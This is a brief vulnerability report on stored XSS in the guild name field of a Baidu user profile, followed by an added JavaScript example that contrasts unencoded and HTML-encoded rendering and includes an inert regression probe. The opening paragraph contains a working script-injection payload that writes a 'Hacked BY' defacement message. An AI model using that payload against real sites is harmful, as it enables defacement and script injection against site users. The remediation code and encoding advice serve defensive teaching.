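The user profile on http://g.baidu.com/ has an XSS vulnerability. In the personal profile, closing the font tag in the guild name field is enough to get XSS. Change the value so that it becomes <font color=”#004ca9″>”><script>document.write(‘<body onload=”document.write(‘Hacked BY 混世魔王’);”‘)</script><”</font></div> <scr…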
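The root cause described above is a guild name written into the page without output encoding. The following is an added example, not code from the original post or from the site: the function names are hypothetical and the probe string is a constructed, inert value. It shows the unencoded rendering next to an encoded one, plus a regression check that the field cannot introduce new elements.

```javascript
// Added example: rendering a user-controlled guild name inside the
// <font> element quoted in the post. All function names are hypothetical.

// Vulnerable pattern: the value is concatenated into markup as-is, so any
// `<` in it starts a new element in the page.
function renderGuildNameUnsafe(name) {
  return '<font color="#004ca9">' + name + '</font>';
}

// HTML-encode the characters that are significant in element content
// and in quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: encode at the point of output, every time.
function renderGuildNameSafe(name) {
  return '<font color="#004ca9">' + escapeHtml(name) + '</font>';
}

// Regression check: list the names of all start tags in a rendered fragment.
// A correctly encoded field yields only the template's own <font>.
function openingTags(html) {
  return [...html.matchAll(/<([a-zA-Z][a-zA-Z0-9]*)\b/g)].map((m) => m[1].toLowerCase());
}

// Constructed, inert probe: it only tries to add a <b> element.
const probe = '"><b id="probe">x</b><"';

console.log(openingTags(renderGuildNameUnsafe(probe)));
console.log(openingTags(renderGuildNameSafe(probe)));
console.log(renderGuildNameSafe(probe));
```

Encoding belongs at output time for the HTML context in use; filtering specific tags on input leaves the same field exposed to any markup the filter does not list.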